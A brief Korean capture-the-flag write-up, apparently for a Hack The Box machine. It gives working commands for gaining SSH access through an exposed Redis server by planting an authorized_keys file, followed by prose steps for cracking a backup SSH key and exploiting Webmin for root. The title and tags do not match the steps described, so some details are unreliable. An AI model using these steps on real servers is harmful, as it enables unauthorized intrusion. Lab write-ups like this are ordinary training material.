HTB-Devzat Write up
golang, git-dumper
Enumeration
6379 port Redis key-value store 4.0.9 확인
hacktricks redis attack 방법
ssh-keygen -t rsa
vi id_rsa.pub //앞에 2줄 맨뒤에 2줄 엔터키 입력 (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
redis-cli -h 10.85.0.52
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save
ssh -i id_rsa redis@10.85.0.52
Privilege Escalation
linpeas.sh에서 id_rsa.bak 파일을 발견
ssh2john.py와 john을 이용하여 rsa파일 crack하여 Matt 계정에 접속 가능
해당 계정으로 10000 포트의 Webmin 웹페이지 접속 가능
서버 탐색 시 webmin 의 버전 1.190 확인 가능 (nmap에서도 확인 가능)
해당 버전의 취약점을 사용하여 root쉘 획득 가능
